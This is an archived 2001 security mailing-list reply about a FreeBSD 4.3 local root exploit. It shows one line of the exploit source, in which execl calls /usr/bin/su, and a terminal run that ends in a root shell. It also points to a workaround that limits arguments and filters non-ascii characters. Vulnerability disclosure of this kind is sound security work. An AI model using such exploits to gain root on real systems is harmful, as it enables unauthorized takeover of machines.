Re: FreeBSD 4.3 local root

From: Przemyslaw Frasunek (venglinat_private)
Date: Wed Jul 11 2001 - 05:31:06 PDT

Next message: Przemyslaw Frasunek: "Re: Re[2]: FreeBSD 4.3 local root, yet Linux and *BSD much better than Windows"

Previous message: LAMI, Gilles - DSIA: "IBM Windows DB2 DoS"
Next in thread: Matias Sedalo: "Re: FreeBSD 4.3 local root"
Reply: Matias Sedalo: "Re: FreeBSD 4.3 local root"
Reply: Foldi Tamas: "Re: FreeBSD 4.3 local root"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

> Well, after a bunch of tests I've found only two suids which gave me
> suid shell:
> /usr/bin/passwd
> /usr/local/bin/ssh1

/usr/bin/su also works for me:

riget:venglin:~> egrep -e execl vvfreebsd.c
  if(!execl("/usr/bin/su","su","szymon",0))

riget:venglin:~> ./v
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe72
child=57660
Password:done
# id
uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)

> So, quick workaround should be

Quick workaround is to limit arguments, environment and filter non-ascii
characters:

http://www.frasunek.com/sources/security/rexec/

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslawat_private ** PGP: D48684904685DF43EA93AFA13BE170BF *

Next message: Przemyslaw Frasunek: "Re: Re[2]: FreeBSD 4.3 local root, yet Linux and *BSD much better than Windows"
Previous message: LAMI, Gilles - DSIA: "IBM Windows DB2 DoS"
Next in thread: Matias Sedalo: "Re: FreeBSD 4.3 local root"
Reply: Matias Sedalo: "Re: FreeBSD 4.3 local root"
Reply: Foldi Tamas: "Re: FreeBSD 4.3 local root"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 07:57:44 PDT